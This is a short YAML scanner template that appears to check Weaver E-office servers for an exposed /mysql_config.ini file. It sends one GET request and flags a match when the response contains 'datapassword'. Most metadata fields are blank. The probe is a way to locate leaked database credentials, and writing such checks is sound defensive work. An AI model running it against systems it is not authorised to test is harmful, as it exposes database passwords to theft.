id:

info:
  name: 泛微E-office mysql_config.ini 数据库信息泄漏
  severity:
  description:
  details:
  repair:
requests1:
  method: GET
  path: /mysql_config.ini
  headers:
    User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0
    Content-Type: application/josn
response1:
  headers:
  body: datapassword
  code:
requests2:
response2: